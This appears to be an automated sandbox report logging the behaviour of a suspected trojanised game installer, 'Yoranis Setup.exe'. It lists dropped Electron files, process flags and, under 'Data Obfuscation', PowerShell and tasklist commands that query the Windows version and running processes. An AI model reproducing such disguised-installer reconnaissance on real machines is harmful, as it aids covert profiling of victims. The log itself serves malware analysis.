Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b4a0680f-9ee1-57b1-adfd-e68812be32d6
Source: Yoranis Setup.exe Static file information: File size 87733089 > 1048576
Source: Yoranis Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\projects\src\out\Default\dxcompiler.dll.pdb source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: dxil.dll.0.dr Static PE information: 0x7DBE8527 [Fri Nov 7 02:32:07 2036 UTC]
Source: dxcompiler.dll.0.dr Static PE information: section name: .00cfg
Source: dxcompiler.dll.0.dr Static PE information: section name: .gxfg
Source: dxcompiler.dll.0.dr Static PE information: section name: .retplne
Source: dxcompiler.dll.0.dr Static PE information: section name: _RDATA
Source: dxil.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: YoransSetup.exe.0.dr Static PE information: section name: .00cfg
Source: YoransSetup.exe.0.dr Static PE information: section name: .gxfg
Source: YoransSetup.exe.0.dr Static PE information: section name: .retplne
Source: YoransSetup.exe.0.dr Static PE information: section name: .rodata
Source: YoransSetup.exe.0.dr Static PE information: section name: CPADinfo
Source: YoransSetup.exe.0.dr Static PE information: section name: LZMADEC
Source: YoransSetup.exe.0.dr Static PE information: section name: _RDATA
Source: YoransSetup.exe.0.dr Static PE information: section name: malloc_h
Source: dxcompiler.dll0.0.dr Static PE information: section name: .00cfg
Source: dxcompiler.dll0.0.dr Static PE information: section name: .gxfg
Source: dxcompiler.dll0.0.dr Static PE information: section name: .retplne
Source: dxcompiler.dll0.0.dr Static PE information: section name: _RDATA
Source: dxil.dll0.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr Static PE information: section name: _RDATA
Source: vk_swiftshader.dll0.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll0.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll0.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll0.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll0.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll0.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll0.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll0.0.dr Static PE information: section name: _RDATA
Source: YoransSetup.exe0.0.dr Static PE information: section name: .00cfg
Source: YoransSetup.exe0.0.dr Static PE information: section name: .gxfg
Source: YoransSetup.exe0.0.dr Static PE information: section name: .retplne
Source: YoransSetup.exe0.0.dr Static PE information: section name: .rodata
Source: YoransSetup.exe0.0.dr Static PE information: section name: CPADinfo
Source: YoransSetup.exe0.0.dr Static PE information: section name: LZMADEC
Source: YoransSetup.exe0.0.dr Static PE information: section name: _RDATA
Source: YoransSetup.exe0.0.dr Static PE information: section name: malloc_h
Source: node.napi.node0.0.dr Static PE information: section name: _RDATA
Source: registry.node.0.dr Static PE information: section name: .fptable
Source: node_sqlite3.node.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsExec.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\ffmpeg.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\YoransSetup.exe
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\System.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\ffmpeg.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\dxil.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\vk_swiftshader.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\SpiderBanner.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\StdUtils.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxcompiler.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-ia32\node.napi.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-x64\node.napi.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\dxcompiler.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxil.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\vulkan-1.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txt
Source: C:\Users\user\Desktop\Yoranis Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YoransSetup.lnk
Source: C:\Users\user\Desktop\Yoranis Setup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
